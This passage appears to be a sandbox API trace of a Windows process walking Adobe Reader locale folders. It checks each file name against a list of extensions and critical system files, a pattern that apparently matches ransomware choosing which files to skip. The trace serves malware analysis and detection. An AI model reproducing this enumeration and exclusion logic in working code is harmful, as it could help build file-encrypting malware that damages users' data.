FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82ae5a40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="EScript.JPN", cAlternateFileName="")) returned 1 [0058.480] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82b0bba0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="IA32.JPN", cAlternateFileName="")) returned 1 [0058.480] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7da69260, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xb600, dwReserved0=0x0, dwReserved1=0x0, cFileName="makeaccessible.JPN", cAlternateFileName="MAKEAC~1.JPN")) returned 1 [0058.480] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d749580, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xf200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Multimedia.JPN", cAlternateFileName="MULTIM~1.JPN")) returned 1 [0058.480] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d9f6e40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="pddom.JPN", cAlternateFileName="")) returned 1 [0058.480] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82b0bba0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x5a000, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPKLite.JPN", cAlternateFileName="")) returned 1 [0058.480] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f8506c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xf8e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="RdLang32.JPN", cAlternateFileName="")) returned 1 [0058.481] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82f5c380, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadOutLoud.JPN", cAlternateFileName="READOU~1.JPN")) returned 1 [0058.481] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7da1cfa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="reflow.JPN", cAlternateFileName="")) returned 1 [0058.481] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7da8f3c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="SaveAsRTF.JPN", cAlternateFileName="SAVEAS~1.JPN")) returned 1 [0058.481] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82b31d00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x0, dwReserved1=0x0, cFileName="Search.JPN", cAlternateFileName="")) returned 1 [0058.481] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82b31d00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3200, dwReserved0=0x0, dwReserved1=0x0, cFileName="SendMail.JPN", cAlternateFileName="")) returned 1 [0058.481] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0058.481] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.481] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.481] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="DEXShare.asfx", cAlternateFileName="DEXSHA~1.ASF")) returned 1 [0058.481] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f71060, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services.asfx", cAlternateFileName="SERVIC~1.ASF")) returned 1 [0058.481] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f71060, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services.asfx", cAlternateFileName="SERVIC~1.ASF")) returned 0 [0058.481] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.482] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ddd5200, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Spelling.JPN", cAlternateFileName="")) returned 1 [0058.482] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f4e4720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="updater.JPN", cAlternateFileName="")) returned 1 [0058.482] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82ae5a40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x5600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weblink.JPN", cAlternateFileName="")) returned 1 [0058.482] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82ae5a40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x5600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weblink.JPN", cAlternateFileName="")) returned 0 [0058.482] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.482] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d6d7160, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82ee9f60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82ee9f60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko_KR", cAlternateFileName="")) returned 1 [0058.482] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d6d7160, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82ee9f60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82ee9f60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.484] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d6d7160, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82ee9f60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82ee9f60, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.485] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d9aab80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x7e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="accessibility.KOR", cAlternateFileName="ACCESS~1.KOR")) returned 1 [0058.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="KOR", cchCount2=3) returned 1 [0058.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="KOR", cchCount2=3) returned 3 [0058.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="KOR", cchCount2=3) returned 3 [0058.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="KOR", cchCount2=3) returned 3 [0058.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="KOR", cchCount2=3) returned 3 [0058.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="KOR", cchCount2=3) returned 3 [0058.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="ACCESSIBILITY.KOR", cchCount2=17) returned 3 [0058.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="ACCESSIBILITY.KOR", cchCount2=17) returned 3 [0058.485] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="ACCESSIBILITY.KOR", cchCount2=17) returned 3 [0058.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="ACCESSIBILITY.KOR", cchCount2=17) returned 3 [0058.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="ACCESSIBILITY.KOR", cchCount2=17) returned 3 [0058.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="ACCESSIBILITY.KOR", cchCount2=17) returned 3 [0058.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="ACCESSIBILITY.KOR", cchCount2=17) returned 3 [0058.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="ACCESSIBILITY.KOR", cchCount2=17) returned 3 [0058.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="ACCESSIBILITY.KOR", cchCount2=17) returned 3 [0058.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="ACCESSIBILITY.KOR", cchCount2=17) returned 3 [0058.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="ACCESSIBILITY.KOR", cchCount2=17) returned 3 [0058.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="ACCESSIBILITY.KOR", cchCount2=17) returned 3 [0058.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="ACCESSIBILITY.KOR", cchCount2=17) returned 3 [0058.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="ACCESSIBILITY.KOR", cchCount2=17) returned 3 [0058.486] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82bf03e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x48c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acroform.KOR", cAlternateFileName="")) returned 1 [0058.486] CharUpperBuffW (in: lpsz=".KOR", cchLength=0x4 | out: lpsz=".KOR") returned 0x4 [0058.486] CharUpperBuffW (in: lpsz="Acroform.KOR", cchLength=0xc | out: lpsz="ACROFORM.KOR") returned 0xc [0058.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="KOR", cchCount2=3) returned 1 [0058.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.486] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="KOR", cchCount2=3) returned 3 [0058.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="KOR", cchCount2=3) returned 3 [0058.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="KOR", cchCount2=3) returned 3 [0058.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="KOR", cchCount2=3) returned 3 [0058.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="KOR", cchCount2=3) returned 3 [0058.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="ACROFORM.KOR", cchCount2=12) returned 3 [0058.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="ACROFORM.KOR", cchCount2=12) returned 3 [0058.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="ACROFORM.KOR", cchCount2=12) returned 3 [0058.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="ACROFORM.KOR", cchCount2=12) returned 3 [0058.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="ACROFORM.KOR", cchCount2=12) returned 3 [0058.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="ACROFORM.KOR", cchCount2=12) returned 3 [0058.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="ACROFORM.KOR", cchCount2=12) returned 3 [0058.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="ACROFORM.KOR", cchCount2=12) returned 3 [0058.487] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="ACROFORM.KOR", cchCount2=12) returned 3 [0058.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="ACROFORM.KOR", cchCount2=12) returned 3 [0058.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="ACROFORM.KOR", cchCount2=12) returned 3 [0058.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="ACROFORM.KOR", cchCount2=12) returned 3 [0058.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="ACROFORM.KOR", cchCount2=12) returned 3 [0058.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="ACROFORM.KOR", cchCount2=12) returned 3 [0058.488] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x801d5ec0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeCollabSync.KOR", cAlternateFileName="ADOBEC~1.KOR")) returned 1 [0058.488] CharUpperBuffW (in: lpsz=".KOR", cchLength=0x4 | out: lpsz=".KOR") returned 0x4 [0058.488] CharUpperBuffW (in: lpsz="AdobeCollabSync.KOR", cchLength=0x13 | out: lpsz="ADOBECOLLABSYNC.KOR") returned 0x13 [0058.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="KOR", cchCount2=3) returned 1 [0058.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.488] CompareStringW (Locale=0x400, 